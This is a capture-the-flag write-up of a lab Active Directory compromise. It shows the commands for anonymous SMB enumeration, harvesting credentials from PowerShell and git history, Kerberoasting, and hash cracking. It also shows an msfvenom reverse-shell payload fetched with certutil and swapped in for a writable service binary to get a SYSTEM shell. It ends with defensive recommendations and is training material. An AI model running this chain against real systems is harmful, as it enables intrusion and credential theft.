From Anonymous SMB Access to SYSTEM-Level Control

1. Overview

This assessment demonstrates a complete compromise of an Active Directory environment, beginning with unauthenticated access and progressing through credential harvesting, OSINT exploitation, Kerberoasting, and privilege escalation to achieve SYSTEM-level access.

The attack chain highlights how multiple low-severity misconfigurations can be chained together to achieve full domain compromise.

2. Initial Reconnaissance

Nmap Scan

nmap -A <IP> -T5
None
None

Key Observations:

  • Host identified as a Domain Controller: LAB-DC
  • Domain: LAB.ENTERPRISE.THM
  • Key services exposed:
  • Kerberos (88)
  • LDAP (389, 3268)
  • SMB (445)
  • RDP (3389)
  • HTTP (80 — Microsoft IIS)

This confirms the target is part of an Active Directory infrastructure.

3. Environment Configuration

Hosts File Update

nano /etc/hosts
<IP> enterprise.thm lab.enterprise.thm lab-dc.lab.enterprise.thm
None
None

4. SMB Enumeration

Anonymous Share Enumeration

smbclient -L //<IP>/ -N
None

Discovered Shares:

  • ADMIN$
  • C$
  • NETLOGON
  • SYSVOL
  • Users

Anonymous access to SMB shares is enabled, which is a critical misconfiguration.

Accessing the Users Share

smbclient //<IP>/Users -N
ls
cd LAB-ADMIN
ls
None

Identified Users:

  • Administrator
  • LAB-ADMIN
  • bitbucket
  • atlbitbucket

5. Credential Discovery via PowerShell History

Navigating to PowerShell History

Path:

cd AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
ls
get Consolehost_history.txt
cat Consolehost_history.txt
None
None

Extracted Credentials:

replication:101RepAdmin123!!

Credential Validation

crackmapexec smb <IP> -u 'replication' -p '101RepAdmin123!!'
None

The credentials were not valid for SMB access, requiring further pivoting.

6. Web Enumeration and OSINT Pivot

Web Application Discovery

None

The page indicated a migration to GitHub.

GitHub Enumeration

None
None
None
None
  • Organization: Enterprise-THM
  • User: Nik-enterprise-dev

Repository Discovery

None

Repository identified:

mgmtScript.ps1

7. Credential Exposure via Git History

Cloning Repository

git clone https://github.com/Nik-enterprise-dev/mgmtScript.ps1.git
cd mgmtScript.ps1
git log -p
None
None
None

Sensitive Data Identified:

$userName = 'nik'
$userPassword = 'ToastyBoi!'

Credential Validation

nxc smb <IP> -u nik -p 'ToastyBoi!'
None

Valid credentials obtained for domain user nik.

8. Kerberoasting Attack

SPN Enumeration

impacket-GetUserSPNs LAB.ENTERPRISE.THM/nik:ToastyBoi! -dc-ip <IP> -request -outputfile Output_hash.txt
None

Extracted Hash

None

Hash Cracking

hashcat -m 13100 Output_hash.txt /usr/share/wordlists/rockyou.txt
None
None

Cracked Credentials:

bitbucket : littleredbucket

9. Initial Access via RDP

Credential Validation

nxc rdp <IP> -u bitbucket -p 'littleredbucket'
None

RDP Access

xfreerdp3 /u:bitbucket /p:littleredbucket /v:<IP>
None

User Flag

None
THM{ed882d02b34246536ef7da79062bef36}

10. Privilege Escalation Enumeration

Transfer WinPEAS

Attacker machine:

python3 -m http.server 80
None

Target machine:

certutil -urlcache -f http://<IP>/winPEASany.exe winpeas.exe
None

Execute WinPEAS

.\winpeas.exe
None

11. Privilege Escalation

Service Misconfiguration Discovery

icacls "C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe"
None

Finding:

  • Writable permissions assigned to low-privileged users

This allows service binary replacement.

Payload Generation

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe -o ZeroTier_One.exe
None

Transfer Payload

certutil -urlcache -f http://<IP>/ZeroTier_One.exe ZeroTier_One.exe
None

Replace Service Binary

copy-item .\ZeroTier_One.exe "C:\Program Files (x86)\Zero Tier\Zero Tier One\ZeroTier One.exe" -Force

Restart Service

net stop ZeroTierOneService
net start ZeroTierOneService
None

12. SYSTEM Shell

Listener Setup

nc -lvnp 4444

Reverse Shell Received

None
whoami
nt authority\system

13. Root Flag

Access Administrator Desktop

cd C:\Users\Administrator\Desktop
dir
type root.txt
None
THM{1a1fa94875421296331f145971ca4881}

14. Attack Chain Summary

  1. Anonymous SMB access enabled
  2. User enumeration via shared directories
  3. Credential discovery through PowerShell history
  4. Web enumeration leading to GitHub OSINT
  5. Credential exposure in Git commit history
  6. Kerberoasting attack on service account
  7. RDP access using cracked credentials
  8. Privilege escalation via writable service binary
  9. Reverse shell execution as SYSTEM
  10. Full system compromise and flag retrieval

15. Key Security Findings

  • Anonymous SMB access allowed
  • Credentials stored in PowerShell history
  • Secrets exposed in public Git repositories
  • Weak Kerberos service account configuration
  • Writable service binaries
  • Lack of privilege separation

16. Recommendations

  • Disable anonymous SMB access
  • Enforce credential hygiene and secure storage
  • Remove sensitive data from repositories and history
  • Implement strong Kerberos policies and service account controls
  • Restrict file system permissions on service binaries
  • Deploy endpoint monitoring and logging solutions

17. Conclusion

This assessment demonstrates how multiple minor weaknesses can be chained into a full compromise of an Active Directory environment.

The attack required no exploit development, relying entirely on:

  • Misconfigurations
  • Poor credential management
  • Lack of access control enforcement

This emphasizes the importance of defense-in-depth and continuous security auditing within enterprise environments.